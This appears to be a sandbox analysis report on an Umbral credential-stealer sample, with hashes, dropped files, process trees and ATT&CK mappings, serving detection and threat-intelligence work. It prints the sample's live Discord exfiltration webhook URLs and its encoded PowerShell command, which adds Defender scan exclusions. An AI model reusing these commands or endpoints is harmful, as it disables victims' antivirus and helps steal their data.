umbral | e0b7deb5306d43671d3800515bdf5b31455b483a06862be563813eabea3e181d

Analysis

max time kernel
119s
max time network
124s
platform
windows7_x64
resource
win7-20241023-en
resource tags

arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
submitted
22/03/2025, 06:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c06923d356f2cec7eb28dc4224f24f43daee5fa1c13659c1d814849d01da6f32.exe
Size

12.4MB
MD5

eb9198e87da72f5fb0ec127d9cd805ac
SHA1

513d4b80ff6019b3e96ebccb42cf463690dee1bc
SHA256

c06923d356f2cec7eb28dc4224f24f43daee5fa1c13659c1d814849d01da6f32
SHA512

896dbdaa3a602b74cadcc461988aa569e7e97b053065b839d73eeaf76829b41485331e26d1a7fee359ca533cf90dcdadff7d51524b00b2dbb4b60e5fdc2028de
SSDEEP

393216:sHXMr/H4Fij6v42vQREwbXN+umS29dZo:ocr/4FiOvyREwbd+b9dZ

Score

10^/10

umbral defense_evasion pyinstaller stealer

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1351005466335121518/twCTnfzoSiI-aCcNO4qPr6FH-T4gOkPWQV2wxS9C01GGw7XemgcLtgFXaMAxuEVtAD2v

https://discord.com/api/webhooks/1352290842009796729/G8yLk-T0sLJfX9oqfGwDEn679VpKN-s9_di6iL35v7J0EuZOmgrqGv_vPjXY_ihAjPfX

Signatures

Detect Umbral payload 4 IoCs

resource	yara_rule
behavioral11/memory/2856-31-0x0000000000DD0000-0x0000000000E14000-memory.dmp	family_umbral
behavioral11/memory/2824-21-0x00000000001A0000-0x00000000001E4000-memory.dmp	family_umbral
behavioral11/files/0x0007000000004e74-20.dat	family_umbral
behavioral11/files/0x0007000000018c16-29.dat	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral

Executes dropped EXE 4 IoCs

pid	Process
2252	nuker.exe
2824	Node.exe
2856	DSAServiceUpdater.exe
1252	nuker.exe

Loads dropped DLL 3 IoCs

pid	Process
2596	c06923d356f2cec7eb28dc4224f24f43daee5fa1c13659c1d814849d01da6f32.exe
2252	nuker.exe
1252	nuker.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
6	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral11/files/0x0009000000012117-10.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2776	powershell.exe

Suspicious use of AdjustPrivilegeToken 42 IoCs

description	pid	Process
Token: SeDebugPrivilege	2776	powershell.exe
Token: SeDebugPrivilege	2824	Node.exe
Token: SeIncreaseQuotaPrivilege	688	wmic.exe
Token: SeSecurityPrivilege	688	wmic.exe
Token: SeTakeOwnershipPrivilege	688	wmic.exe
Token: SeLoadDriverPrivilege	688	wmic.exe
Token: SeSystemProfilePrivilege	688	wmic.exe
Token: SeSystemtimePrivilege	688	wmic.exe
Token: SeProfSingleProcessPrivilege	688	wmic.exe
Token: SeIncBasePriorityPrivilege	688	wmic.exe
Token: SeCreatePagefilePrivilege	688	wmic.exe
Token: SeBackupPrivilege	688	wmic.exe
Token: SeRestorePrivilege	688	wmic.exe
Token: SeShutdownPrivilege	688	wmic.exe
Token: SeDebugPrivilege	688	wmic.exe
Token: SeSystemEnvironmentPrivilege	688	wmic.exe
Token: SeRemoteShutdownPrivilege	688	wmic.exe
Token: SeUndockPrivilege	688	wmic.exe
Token: SeManageVolumePrivilege	688	wmic.exe
Token: 33	688	wmic.exe
Token: 34	688	wmic.exe
Token: 35	688	wmic.exe
Token: SeIncreaseQuotaPrivilege	688	wmic.exe
Token: SeSecurityPrivilege	688	wmic.exe
Token: SeTakeOwnershipPrivilege	688	wmic.exe
Token: SeLoadDriverPrivilege	688	wmic.exe
Token: SeSystemProfilePrivilege	688	wmic.exe
Token: SeSystemtimePrivilege	688	wmic.exe
Token: SeProfSingleProcessPrivilege	688	wmic.exe
Token: SeIncBasePriorityPrivilege	688	wmic.exe
Token: SeCreatePagefilePrivilege	688	wmic.exe
Token: SeBackupPrivilege	688	wmic.exe
Token: SeRestorePrivilege	688	wmic.exe
Token: SeShutdownPrivilege	688	wmic.exe
Token: SeDebugPrivilege	688	wmic.exe
Token: SeSystemEnvironmentPrivilege	688	wmic.exe
Token: SeRemoteShutdownPrivilege	688	wmic.exe
Token: SeUndockPrivilege	688	wmic.exe
Token: SeManageVolumePrivilege	688	wmic.exe
Token: 33	688	wmic.exe
Token: 34	688	wmic.exe
Token: 35	688	wmic.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 2596 wrote to memory of 2776	2596	c06923d356f2cec7eb28dc4224f24f43daee5fa1c13659c1d814849d01da6f32.exe	30
PID 2596 wrote to memory of 2776	2596	c06923d356f2cec7eb28dc4224f24f43daee5fa1c13659c1d814849d01da6f32.exe	30
PID 2596 wrote to memory of 2776	2596	c06923d356f2cec7eb28dc4224f24f43daee5fa1c13659c1d814849d01da6f32.exe	30
PID 2596 wrote to memory of 2252	2596	c06923d356f2cec7eb28dc4224f24f43daee5fa1c13659c1d814849d01da6f32.exe	32
PID 2596 wrote to memory of 2252	2596	c06923d356f2cec7eb28dc4224f24f43daee5fa1c13659c1d814849d01da6f32.exe	32
PID 2596 wrote to memory of 2252	2596	c06923d356f2cec7eb28dc4224f24f43daee5fa1c13659c1d814849d01da6f32.exe	32
PID 2596 wrote to memory of 2824	2596	c06923d356f2cec7eb28dc4224f24f43daee5fa1c13659c1d814849d01da6f32.exe	34
PID 2596 wrote to memory of 2824	2596	c06923d356f2cec7eb28dc4224f24f43daee5fa1c13659c1d814849d01da6f32.exe	34
PID 2596 wrote to memory of 2824	2596	c06923d356f2cec7eb28dc4224f24f43daee5fa1c13659c1d814849d01da6f32.exe	34
PID 2596 wrote to memory of 2856	2596	c06923d356f2cec7eb28dc4224f24f43daee5fa1c13659c1d814849d01da6f32.exe	35
PID 2596 wrote to memory of 2856	2596	c06923d356f2cec7eb28dc4224f24f43daee5fa1c13659c1d814849d01da6f32.exe	35
PID 2596 wrote to memory of 2856	2596	c06923d356f2cec7eb28dc4224f24f43daee5fa1c13659c1d814849d01da6f32.exe	35
PID 2252 wrote to memory of 1252	2252	nuker.exe	36
PID 2252 wrote to memory of 1252	2252	nuker.exe	36
PID 2252 wrote to memory of 1252	2252	nuker.exe	36
PID 2824 wrote to memory of 688	2824	Node.exe	37
PID 2824 wrote to memory of 688	2824	Node.exe	37
PID 2824 wrote to memory of 688	2824	Node.exe	37

C:\Users\Admin\AppData\Local\Temp\c06923d356f2cec7eb28dc4224f24f43daee5fa1c13659c1d814849d01da6f32.exe
"C:\Users\Admin\AppData\Local\Temp\c06923d356f2cec7eb28dc4224f24f43daee5fa1c13659c1d814849d01da6f32.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2596
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAaQBpACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAYwBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdAB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGUAYgBwACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2776
- C:\Users\Admin\AppData\Roaming\nuker.exe
  "C:\Users\Admin\AppData\Roaming\nuker.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2252
- - C:\Users\Admin\AppData\Roaming\nuker.exe
    "C:\Users\Admin\AppData\Roaming\nuker.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1252
- C:\Users\Admin\AppData\Roaming\Node.exe
  "C:\Users\Admin\AppData\Roaming\Node.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2824
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:688
- C:\Users\Admin\AppData\Roaming\DSAServiceUpdater.exe
  "C:\Users\Admin\AppData\Roaming\DSAServiceUpdater.exe"
  2⤵
  - Executes dropped EXE
  PID:2856

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_MEI22522\python39.dll

Filesize
4.3MB

MD5
64fde73c54618af1854a51db302192fe

SHA1
c5580dcea411bfed2d969551e8089aab8285a1d8

SHA256
d44753fe884b228da36acb17c879b500aeb0225a38fb7ca142fb046c60b22204

SHA512
a7d368301a27ee07a542e45e9ad27683707979fb198b887b66b523609f69e3327d4b77b7edc988c73a4fe26c44bff3abfcd032a991cd730fd8e0de2dad2e3a06

Download Submit
C:\Users\Admin\AppData\Roaming\DSAServiceUpdater.exe

Filesize
244KB

MD5
1427d1d027b98f59ea86447b5dd7992e

SHA1
7e6262be855f807336ce97b3de02e95d95b708da

SHA256
9dd14d95c8f6a0ad31953cd8efc488deccb36a9833cffd793a50fa709988603b

SHA512
8f7bc96c976b6cf5fcc7ba0b999eace349dba1ef1f569e5571975e7603f2d34372fe1c9c5cbf9fbeb5b407d2750c0f4af9ed102967c7dd7b0b7d8c95a3d91f92

Download Submit
C:\Users\Admin\AppData\Roaming\Node.exe

Filesize
246KB

MD5
34498c04705f269e79dd09c555ffd2a4

SHA1
744d9cdaaf4033b944563fb79800c8ddeffffeab

SHA256
fe25de503f5fa57842d11d2180a935855b8f89b23fd6fa95ff10272cee5f305a

SHA512
fd3f4f296d62376f08a1ce9dc8b4baefe03334edc2d55633fe8016cf0e90e067a7b6949e73605e102aa22f389da96ef8e8c1589f521583173d28fdd195e0a3a2

Download Submit
\Users\Admin\AppData\Roaming\nuker.exe

Filesize
11.9MB

MD5
4e92ec59842a81a9928f3518b0bcd1ca

SHA1
516fc5b9f5cd1821f2897c2abd9850fcf6fe278d

SHA256
e8838599e4c50e8e213e87dea7ea65b841df51ca2f50053b7a6800f4449bd5fa

SHA512
d66635486e571fb8a44f685766ce515a605ded953a5769da850d17e45f86874d242b7e5009ac527fc69ccfb9b0d773184165689615c097a847ed99f618d0e738

Download Submit
memory/2596-1-0x00000000012F0000-0x0000000001F64000-memory.dmp

Filesize
12.5MB

Download
memory/2596-2-0x000007FEF5FD0000-0x000007FEF69BC000-memory.dmp

Filesize
9.9MB

Download
memory/2596-0-0x000007FEF5FD3000-0x000007FEF5FD4000-memory.dmp

Filesize
4KB

Download
memory/2596-32-0x000007FEF5FD0000-0x000007FEF69BC000-memory.dmp

Filesize
9.9MB

Download
memory/2776-9-0x0000000002B20000-0x0000000002BA0000-memory.dmp

Filesize
512KB

Download
memory/2776-22-0x000000001B810000-0x000000001BAF2000-memory.dmp

Filesize
2.9MB

Download
memory/2776-24-0x0000000002390000-0x0000000002398000-memory.dmp

Filesize
32KB

Download
memory/2824-21-0x00000000001A0000-0x00000000001E4000-memory.dmp

Filesize
272KB

Download
memory/2856-31-0x0000000000DD0000-0x0000000000E14000-memory.dmp

Filesize
272KB

Download